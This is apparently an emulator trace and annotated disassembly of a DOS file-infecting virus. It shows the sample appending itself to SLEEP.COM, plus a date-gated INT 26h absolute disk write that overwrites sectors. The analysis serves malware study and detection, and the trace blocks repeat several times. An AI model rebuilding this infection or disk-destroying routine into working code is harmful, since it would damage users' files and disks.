2018-12-25T12:21:18.35304235Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.356696572Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.363383246Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.372697088Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.385014102Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.389336135Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.39748625Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.405874814Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.409372804Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.422034454Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.424655062Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.433857511Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.438029463Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.441741085Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.446350246Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.449041573Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.454678758Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.466225058Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.471348544Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.473490397Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.482412078Z 67 PC: 12d22 | Get or set file attributes (See above)
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DH=month, DL=day). Linear disassembly: 0x12b7b-0x12b86 follow an unconditional
; jmp and appear to be data decoded as instructions.
2018-12-25T12:21:18.495272932Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; DH:DL == 06:06, i.e. 6 June
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94  ; any other date; the trace continues with the chdir calls at 12d9f/12da6 (run settings on this page give 1 January)
0x12b78: jmp 0x12d28  ; date matched: date-triggered path at 0x12d28 (not shown)
0x12b7b: and ah, bh  ; NOTE(review): likely data, not code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 8B EC from 0x12b84 would be push bp / mov bp, sp - decoder looks desynchronised, confirm against raw bytes
0x12b86: in al, dx  ; NOTE(review): byte EC, probably the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:18.497942015Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.502784366Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DL=day of month, DH=month, AL=day of week). The trace reaches this call site twice
; per file, before and after the 1126-byte write at 12a98. Linear disassembly:
; lines after an unconditional jmp or ret may not be reachable code.
2018-12-25T12:21:18.398728473Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; day of month == 2 ?
0x12a5d: je 0x12a62  ; yes -> disk-write path below
0x12a5f: jmp 0x12a80  ; no -> straight to ret (run settings on this page give Day 1, so presumably this is the path taken here)
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this is CWD (DX <- sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100, the sector count in the INT 26h register layout
0x12a69: int 0x26  ; DOS absolute disk write (AL=drive, CX=sectors, DX=first sector, DS:BX=buffer): destructive-payload indicator
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; presumably a second INT 26h set-up: AL=3 would be drive D: (0=A) - confirm
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62  ; NOTE(review): printed target is outside the traced range; with 16-bit wrap of the displacement it would be 0x12a62 (the INT 26h path) - confirm
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret; belongs to whatever follows this routine
2018-12-25T12:21:18.402644155Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:18.407118456Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:18.412396573Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:18.414036543Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:18.428675359Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.43735214Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
; Disassembly window at the return address of DOS Get time (INT 21h AH=2Ch returns
; DH=seconds, DL=hundredths). The INT 21h calls below line up with the next trace
; rows: attributes at 12ca8, close at 12cac, open at 12cb1.
2018-12-25T12:21:18.444860575Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; DL = hundredths + seconds
0x12c90: je 0x12c8a  ; a zero sum is rejected; 0x12c8a is not shown, presumably it re-reads the time
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word stored at DS:0x106
0x12c99: mov byte ptr [si], dl  ; non-zero time-derived byte saved; presumably a per-infection key - confirm
0x12c9b: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX=0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = path string at SI+0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle (BX is set outside this window)
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: reopen with access mode 2 (read/write)
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set means the open failed; 0x12c63 is not shown
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; store the new handle (AX) at ES:[DX+0x63]
0x12cb9: xchg ax, bx  ; handle -> BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write; the trace logs the first write at 12cc4
2018-12-25T12:21:18.449005878Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:18.461999391Z 62 PC: 12cac | Close file
2018-12-25T12:21:18.464497883Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.469704277Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:18.471785274Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.473776016Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.476200374Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:18.477654536Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.479398169Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:18.486187609Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.489514024Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:18.491683005Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.501621641Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.520820365Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.524944069Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.540321249Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.548569283Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.551457013Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.563816671Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.580447925Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.589335923Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.592888355Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.597003065Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.600203264Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.602204877Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.606121239Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.616290391Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.619209534Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.62183225Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.6310396Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.642336836Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.645932405Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.654425201Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.661693529Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.664185719Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.676005617Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.678046414Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.685874594Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.68961038Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.692914101Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.696197337Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.699047638Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.702485923Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.71234687Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.715731975Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.717819992Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.727096901Z 67 PC: 12d22 | Get or set file attributes (See above)
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DH=month, DL=day). Linear disassembly: 0x12b7b-0x12b86 follow an unconditional
; jmp and appear to be data decoded as instructions.
2018-12-25T12:21:18.739427191Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; DH:DL == 06:06, i.e. 6 June
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94  ; any other date; the trace continues with the chdir calls at 12d9f/12da6 (run settings on this page give 1 January)
0x12b78: jmp 0x12d28  ; date matched: date-triggered path at 0x12d28 (not shown)
0x12b7b: and ah, bh  ; NOTE(review): likely data, not code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 8B EC from 0x12b84 would be push bp / mov bp, sp - decoder looks desynchronised, confirm against raw bytes
0x12b86: in al, dx  ; NOTE(review): byte EC, probably the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:18.742335978Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.747247987Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DL=day of month, DH=month, AL=day of week). The trace reaches this call site twice
; per file, before and after the 1126-byte write at 12a98. Linear disassembly:
; lines after an unconditional jmp or ret may not be reachable code.
2018-12-25T12:21:18.613878728Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; day of month == 2 ?
0x12a5d: je 0x12a62  ; yes -> disk-write path below
0x12a5f: jmp 0x12a80  ; no -> straight to ret (run settings on this page give Day 1, so presumably this is the path taken here)
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this is CWD (DX <- sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100, the sector count in the INT 26h register layout
0x12a69: int 0x26  ; DOS absolute disk write (AL=drive, CX=sectors, DX=first sector, DS:BX=buffer): destructive-payload indicator
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; presumably a second INT 26h set-up: AL=3 would be drive D: (0=A) - confirm
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62  ; NOTE(review): printed target is outside the traced range; with 16-bit wrap of the displacement it would be 0x12a62 (the INT 26h path) - confirm
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret; belongs to whatever follows this routine
2018-12-25T12:21:18.616864338Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:18.633167434Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:18.638233513Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:18.639746095Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:18.647068011Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.654590644Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
; Disassembly window at the return address of DOS Get time (INT 21h AH=2Ch returns
; DH=seconds, DL=hundredths). The INT 21h calls below line up with the next trace
; rows: attributes at 12ca8, close at 12cac, open at 12cb1.
2018-12-25T12:21:18.661906415Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; DL = hundredths + seconds
0x12c90: je 0x12c8a  ; a zero sum is rejected; 0x12c8a is not shown, presumably it re-reads the time
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word stored at DS:0x106
0x12c99: mov byte ptr [si], dl  ; non-zero time-derived byte saved; presumably a per-infection key - confirm
0x12c9b: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX=0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = path string at SI+0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle (BX is set outside this window)
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: reopen with access mode 2 (read/write)
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set means the open failed; 0x12c63 is not shown
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; store the new handle (AX) at ES:[DX+0x63]
0x12cb9: xchg ax, bx  ; handle -> BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write; the trace logs the first write at 12cc4
2018-12-25T12:21:18.665631902Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:18.696428991Z 62 PC: 12cac | Close file
2018-12-25T12:21:18.698898742Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.707274066Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:18.710594136Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.714476509Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.729465712Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:18.732100895Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.734993676Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:18.745564637Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.749560116Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:18.752010126Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.761706597Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.793024561Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.79645302Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.8060602Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.814775765Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.817728104Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.829635629Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.832309221Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.844559626Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.848028675Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.851681419Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.854591428Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.856587029Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.859300491Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.871560734Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.874823549Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.877064586Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.887471402Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.900334094Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.90387408Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.911879861Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.91919045Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.921690856Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.934701205Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.937429624Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.95072215Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.955341634Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.959252582Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.96255209Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.965072759Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.968345014Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.974285969Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.976400963Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.978213369Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.983443904Z 67 PC: 12d22 | Get or set file attributes (See above)
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DH=month, DL=day). Linear disassembly: 0x12b7b-0x12b86 follow an unconditional
; jmp and appear to be data decoded as instructions.
2018-12-25T12:21:18.98990527Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; DH:DL == 06:06, i.e. 6 June
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94  ; any other date; the trace continues with the chdir calls at 12d9f/12da6 (run settings on this page give 1 January)
0x12b78: jmp 0x12d28  ; date matched: date-triggered path at 0x12d28 (not shown)
0x12b7b: and ah, bh  ; NOTE(review): likely data, not code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 8B EC from 0x12b84 would be push bp / mov bp, sp - decoder looks desynchronised, confirm against raw bytes
0x12b86: in al, dx  ; NOTE(review): byte EC, probably the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:18.99203119Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.994638062Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:18.796507254Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; listing starts at the return from INT 21h/AH=2Ah (DL = day of month): is it the 2nd?
0x12a5d: je 0x12a62                  ; day == 2 -> date-gated branch below
0x12a5f: jmp 0x12a80                 ; any other day -> straight to the ret; a run on another emulated date never exercises the writes
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2                   ; AH = 2 makes AX positive, so the sign extension below leaves DX = 0
0x12a65: cdq                         ; one byte long per the addresses; NOTE(review): in 16-bit code that encoding is CWD (AX -> DX:AX)
0x12a66: mov cx, 0x100               ; CX = 0x100 (256) sectors
0x12a69: int 0x26                    ; DOS absolute disk write: AL = drive, CX = sector count, DX = first sector, DS:BX = buffer.
                                     ; AL is not loaded on this path, so it still holds what Get date returned (day of week)
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3                   ; drive number 3 (0 = A:, so D:)
0x12a71: mov cx, 0x2bc               ; CX = 0x2BC (700) sectors
0x12a74: mov dx, 0                   ; starting at sector 0
0x12a77: mov ds, word ptr [di + 0x63]  ; DS:BX (the INT 26h buffer pointer) is loaded from [di + 0x63] / [di + 0x37]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62                ; NOTE(review): target printed without 16-bit IP wraparound; within the segment it would be 0x12a62 above - confirm
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]     ; bytes after the ret; not reached by fall-through
2018-12-25T12:21:18.800394838Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:18.804090098Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:18.80895564Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:18.810562398Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:18.818039346Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.826338733Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:18.833730961Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; listing starts at the return from INT 21h/AH=2Ch (DH = seconds, DL = hundredths): DL = their sum
0x12c90: je 0x12c8a                  ; sum was zero -> back to 0x12c8a (before this listing; presumably re-reads the clock)
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]    ; SI = 0x115 + the word stored at [0x106]
0x12c99: mov byte ptr [si], dl       ; stores the non-zero clock-derived byte; NOTE(review): looks like a per-infection key or seed - confirm
0x12c9b: mov ax, 0x4301              ; INT 21h/AX=4301h: set file attributes
0x12c9e: xor cx, cx                  ; CX = 0: clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca                ; DS:DX = SI + 0xCA, the path handed to the attribute call
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e                ; INT 21h/AH=3Eh: close the handle in BX
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02              ; INT 21h/AH=3Dh, AL=02h: reopen the same path read/write
0x12caf: int 0x21
0x12cb1: jb 0x12c63                  ; CF set = open failed -> 0x12c63 (outside this listing)
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; saves the new handle (AX) at ES:[DX + 0x63]
0x12cb9: xchg ax, bx                 ; handle into BX for the call that follows
0x12cba: mov ah, 0x40                ; INT 21h/AH=40h write; the trace logs the writes at PC 12cc4, 12cd6 and 12ceb
                                     ; attribute clear -> reopen R/W -> writes -> timestamp call (PC 12d0d) is the sequence worth alerting on
2018-12-25T12:21:18.8373158Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:18.855033129Z 62 PC: 12cac | Close file
2018-12-25T12:21:18.856975425Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.865211604Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:18.868608431Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.870480559Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.873284919Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:18.874603605Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.876504706Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:18.883490985Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.885346928Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:18.88668953Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.891731099Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.900163209Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.902386637Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.907418663Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.912692885Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.921753714Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.933820545Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.937566619Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.945035671Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.948179698Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.951753229Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.954751367Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.956517048Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.959968118Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.970733033Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.977296702Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.979593461Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.989432967Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:19.012700508Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:19.016679029Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:19.025270388Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:19.036517917Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:19.038998248Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:19.052321439Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:19.054857488Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:19.063369308Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:19.067394482Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:19.07074033Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:19.074116205Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:19.076563021Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:19.079463573Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:19.090098289Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:19.094152988Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:19.097028877Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:19.106015977Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:19.118694141Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; listing starts at the return from INT 21h/AH=2Ah (DH = month, DL = day): tests for 6 June
0x12b73: je 0x12b78                  ; date matches -> trampoline at 0x12b78
0x12b75: jmp 0x12d94                 ; no match; the next trace rows (PC 12d9f, 12da6) sit just past this target
0x12b78: jmp 0x12d28                 ; date-matched path; its code is not part of this listing
0x12b7b: and ah, bh                  ; NOTE(review): 0x12b7b-0x12b86 follows an unconditional jmp - probably data decoded as code
